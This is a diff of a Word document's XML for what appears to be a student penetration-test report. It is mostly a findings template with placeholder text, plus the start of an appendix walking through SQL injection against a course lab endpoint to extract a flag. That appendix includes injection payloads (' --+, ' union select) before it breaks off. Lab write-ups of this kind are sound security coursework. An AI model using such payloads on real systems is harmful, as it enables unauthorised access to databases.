+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>http://example.com</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="35" w:name="_Toc71299239"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Recommendation</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="35"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>The fix goes here</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="36" w:name="_Toc71299240"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Finding </w:t>
+      </w:r>
+      <w:r>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:r>
+        <w:t>SQL wi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ld</w:t>
+      </w:r>
+      <w:r>
+        <w:t>card attack vulnerability present in the API for trainings</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="36"/>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9000" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+          <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+          <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+          <w:insideH w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2595"/>
+        <w:gridCol w:w="6405"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="37" w:name="_Toc71299241"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Description</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="37"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Detailed description of the vulnerability, including a risk statement.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="38" w:name="_Toc71299242"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Proof of Concept</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="38"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>How can we reproduce the exploit for this vulnerability?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="39" w:name="_Toc71299243"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Impact</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="39"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve">Negligible/Minor/Moderate/Major/Catastrophic: An attacker could do </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>xyz</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> with this vulnerability</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="40" w:name="_Toc71299244"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Likelihood</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="40"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Rare/Unlikely/Possible/Likely/Almost Certain: The possibility of the vulnerability being exploited</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="41" w:name="_Toc71299245"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Risk Rating</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="41"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Informational / Low / Medium / High / Extreme</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>This is the reasoning behind my rating</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="42" w:name="_Toc71299246"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>References</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="42"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>http://example.com</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2595" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Heading3"/>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="43" w:name="_Toc71299247"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Recommendation</w:t>
+            </w:r>
+            <w:bookmarkEnd w:id="43"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6405" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:tcMar>
+              <w:top w:w="100" w:type="dxa"/>
+              <w:left w:w="100" w:type="dxa"/>
+              <w:bottom w:w="100" w:type="dxa"/>
+              <w:right w:w="100" w:type="dxa"/>
+            </w:tcMar>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>The fix goes here</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="_Toc69927413"/>
+      <w:bookmarkStart w:id="44" w:name="_Appendix_I_-"/>
+      <w:bookmarkStart w:id="45" w:name="_Toc71299248"/>
+      <w:bookmarkEnd w:id="44"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Appendix I - Risk Matrix</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="27"/>
+      <w:bookmarkEnd w:id="45"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -4731,7 +8144,7 @@
                     <pic:cNvPicPr preferRelativeResize="0"/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId11"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -4764,12 +8177,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="_Toc69927414"/>
+      <w:bookmarkStart w:id="46" w:name="_Toc71299249"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Appendix 2 - Additional Information</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="28"/>
+      <w:bookmarkEnd w:id="46"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -4777,9 +8190,2660 @@
         <w:t>This section is for any additional information you feel is relevant. This is where all your code and large proof of concepts should be! Make sure the code is properly formatted (and keep it in another file if needed, but refer to it properly)</w:t>
       </w:r>
     </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="47" w:name="_Section_1_–"/>
+      <w:bookmarkEnd w:id="47"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ection 1 – SQL injection exploitation walkthrough</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>The following steps</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (only critical steps</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> are shown</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> here</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> provide a proof of concept for an attack that exploits this vulnerability and retrieves sensitive information (in the form of the flag).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Each payload is placed at the end of the finding user API endpoint (</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:eastAsia="zh-CN"/>
+          </w:rPr>
+          <w:t>http://assignment-hermes.unimelb.life/find-user.php?username=</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="895"/>
+        <w:gridCol w:w="3920"/>
+        <w:gridCol w:w="4204"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="895" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Step</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3920" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Payload</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4204" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Explanation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="895" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3920" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="5"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> --+</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ListParagraph"/>
+              <w:numPr>
+                <w:ilvl w:val="0"/>
+                <w:numId w:val="5"/>
+              </w:numPr>
+              <w:ind w:firstLineChars="0"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
